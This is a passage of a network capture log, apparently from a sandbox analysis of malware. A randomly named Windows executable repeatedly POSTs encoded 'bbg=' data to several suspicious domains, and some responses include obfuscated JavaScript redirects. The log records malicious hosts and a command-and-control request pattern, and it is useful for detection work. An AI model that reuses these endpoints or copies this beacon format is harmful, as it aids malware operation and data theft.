Jan 10, 2025 19:51:59.687520027 CET | 1236 | IN | Data Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                                                      Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
Jan 10, 2025 19:51:59.687537909 CET | 155 | IN | Data Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                                                      Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>
Jan 10, 2025 19:51:59.687551975 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49996 | 154.23.184.207 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:15.403732061 CET | 768 | OUT | POST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4ZPKX1vioV/dZjnF15L1asUQ8EmONFab/brtt/1c=
Jan 10, 2025 19:52:16.251338959 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49997 | 154.23.184.207 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:18.061773062 CET | 788 | OUT | POST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/08EU1G6Uq6WBI9dhiKpyPwNg95DR9tx610fsQF+
Jan 10, 2025 19:52:19.076716900 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:18 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49998 | 154.23.184.207 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:20.684868097 CET | 1805 | OUT | POST /9ffw/ HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.d48dk.top
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.d48dk.top/9ffw/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:52:21.667274952 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:21 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49999 | 154.23.184.207 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:23.227557898 CET | 520 | OUT | GET /9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.d48dk.top
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:52:24.180160046 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:24 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 138
                                                                                      Connection: close
                                                                                      ETag: "66927002-8a"
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 50001 | 38.165.29.234 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:29.600497007 CET | 786 | OUT | POST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=pni45pvYJcfAgSetnLagOxZp/2kfmYI7RomtC8O2crExPgrXXqG2rt7n9hZoGtvPrdDbV8z5AMXio6Pd4aIfE4FLaSVOp3ohG1OGwGAWmBEUFJ2WukoWl23covnrD5leR9qNEN8dH7/sohZ3xbt9Q+9j7bLu7IBlen2nvAqCkxOpSxysSSnWzpFMo0u3pEiUB7aIpyQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 50002 | 38.165.29.234 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:32.153207064 CET | 806 | OUT | POST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYgxOAbXWvm2st7nzBZpCtvQrdPpV+n5AMrio4Xd4pQcWYFJSyVQjXohG1OGwGUvmHsUF6uW0GMJ+W3fvvnrH5laR9rYEPI3H5Hsold3xqt+f+9llrL985kTXkO21mjA33CyenDGIwv+gJp04nmA40D9bYK43lGMRiHRfWk4ILBGZXYDtkNG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 50003 | 38.165.29.234 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:34.703620911 CET | 1823 | OUT | POST /d3gs/ HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.8312zcksnu.bond
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.8312zcksnu.bond/d3gs/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=pni45pvYJcfAjyutlsugGxZmmGkfv4I/RoatC96mcYoxPyTXWJu2tt7nsxZkCtvdrdntV+rpAJvipbfdvMkcdYFJeSVRp3o4G1eCwGEvmHsUF9WW6EoJ8W3covnnD5l2R9jIEPMNHonsrFN32IF+S+9nkrKg85YAXkC61m/+3wGybWaMSTfp+5EXyFictRzdFJaz22qoSTPGJyMbL/4zdT0F9Sc21k6hbs3sAYvqmXByBDv4dMaZVTB67jj9yXOUOn1Ew7gdkTa3H7T/mHft+kuY5Qp/4iYyiNLIGBFej6V34nH+lbgoVAmKNmTMF9hioaeE6lyjyJN6VWOdTWnlFOpEYWt+L/b9PeQKW45ib64oeSx9AhP+nNQkUf5rHAJz2iRK+raVsszc7xmAvpdTfRrwoEDLDPYM+GusO/qhqIp+q6hqdwMU7Io70UcXR73oGE4Y2wkAQEt22OgaW0g0qiMlyhsriPzzuY/LjVL8FJtKwNRiMbGvRbvH0P/TMdRNSsLB5rSdPeQpxveVg/SvH1XdUILxX7FyhSZyzZaxBw74tvE0ch6svsEck60oujUr5pdqifA2wclxW5slnop1jS0/QZBWh6J50b9rCYOPxRpR6L4lU50K9bjh01c88AOaEP4+Pc0Gvyzln+t58oUFjsZt5iBF4YjL2qK5CaimoxXa4oRmu2qkn6HLRtO+nF+s3KZyMNeXDDDsXFZ/zlyeWzcbZde0YR2TsNzWIO6/eXaBY4ryfh2O4DGPFsPEOQ6IRbGZilD0qKClrFNDozvn7lryuFl5j1AMhKPzV6gNLfCUW5VIWQZD5z4ZAEXSuMSciWZCMBrqVVVCD1zpuEmeG4tzkTbIplDkvhxYM5jqq1/hV1bGXmSANsxwMmq0gR+POkFbRX+bWUDgcv29vmeuISKuYNHnO3I/zqh2BqI1DPxja6O+T8MqB5dDrtdJBnMNVwB4JD1TIYSmODNEh0ZydZTHJGa/Qb2vAQ449PvtwWLu6clm [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 50004 | 38.165.29.234 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:37.247426987 CET | 526 | OUT | GET /d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ== HTTP/1.1
                                                                                      Host: www.8312zcksnu.bond
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:52:38.717694044 CET | 856 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:52:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Data Ascii: 297<script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?1da591af2ff1138fe9a515dc33eb5bf7"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script> var url = "https://djwe.bekru.wgljk.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; setTimeout(function() { window[_0x0[0]][_0x0[1]] = url; }, 0);</script>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 50006 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:43.779007912 CET | 768 | OUT | POST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=WekfKnjJCwpVNRohfKjzwYDGmlFxrzC0bsiK1L5MrNcQjSgTQJXDAoyQ45g+HRUeK68nMyKJIeNWHH1qcSlYfn8blP3NEpQR7DUebxHCWJHvaI529/glA+24xHZDpK3qUS9yVcFX7zBKo+vo2XDj69iAic/mGsSQgmRlK3s7C2dWi1a/x9lQuN0ChQYcsS5QlqPrzR0=
Jan 10, 2025 19:52:44.231848955 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 50007 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:46.327354908 CET | 788 | OUT | POST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=WekfKnjJCwpVfiwhdt3znoDJpFFxlTCwbsuK1Phcr/4QjwoTRNLDDoyQwZg3YhUJK6xQMzGJIYhWHCRqclxbf38dtv3LApQR7DUebxiXWJfvZ4J28egmbe272HZDjq32US9AVZ5x7xJKo+fo2Fr809iO/M+fJMXgn0JvOkRySVRijDrVrft49tY6xDQr9iY5/JfbtGjCBDQ3F4+5jIXpItxiIwTt
Jan 10, 2025 19:52:46.767559052 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 50008 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:48.874629021 CET | 1805 | OUT | POST /4nyz/ HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.snyp.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.snyp.shop/4nyz/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:52:49.322103977 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                      content-length: 0
                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 50009 | 13.248.169.48 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:52:51.415097952 CET | 520 | OUT | GET /4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.snyp.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Jan 10, 2025 19:52:54.928648949 CET | 387 | IN | HTTP/1.1 200 OK
                                                                                      content-type: text/html
                                                                                      date: Fri, 10 Jan 2025 18:52:54 GMT
                                                                                      content-length: 266
                                                                                      connection: close
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 50010 | 156.251.17.224 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:00.328589916 CET | 780 | OUT | POST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=pbJNUPA8iWSjp7e4IFqEXuo8t7x14BViTbPV48ldTwI5oIMOpbxTPwwGQNQwnE0FhdNOfAoHx4BHD9wglo7ma5pd0j9aJUFBnrAE6YXxHHNT52Tv2AAtlsVn9ZOt8wXZ7irv50ld1gpNfp4RB+q6+STTUs4T4s9YQ1VoD4dPBoRs4qicKdT6fbJgUGQ987IW0ZIt/6w=
Jan 10, 2025 19:53:01.207426071 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 50011 | 156.251.17.224 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:02.876174927 CET | 800 | OUT | POST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=pbJNUPA8iWSjpau4OmCEVOo7jbx1yhVmTazV49R0Ti85otwOn5VTCQwGYtQxok1JhdIxfFoHx4FHD50giZ7lc5pTvT9YNUFBnrAE6c+5HHVT5Hjv3jZfksVk6ZOt4wXF7ird5wF71mtNftoRCvq7wSTVL85NweMWK2ZjHqUbbJ5M9cT2Q/bSM7lYEVYKtLp/u6YdhtllJXmoSpDBVzQ4DnZfBCCe
Jan 10, 2025 19:53:03.758435011 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:53:03 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 548
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50012 | 156.251.17.224 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 19:53:05.425769091 CET | 1817 | OUT | POST /u11p/ HTTP/1.1
                                                                                      Host: www.duwixushx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.duwixushx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.duwixushx.xyz/u11p/
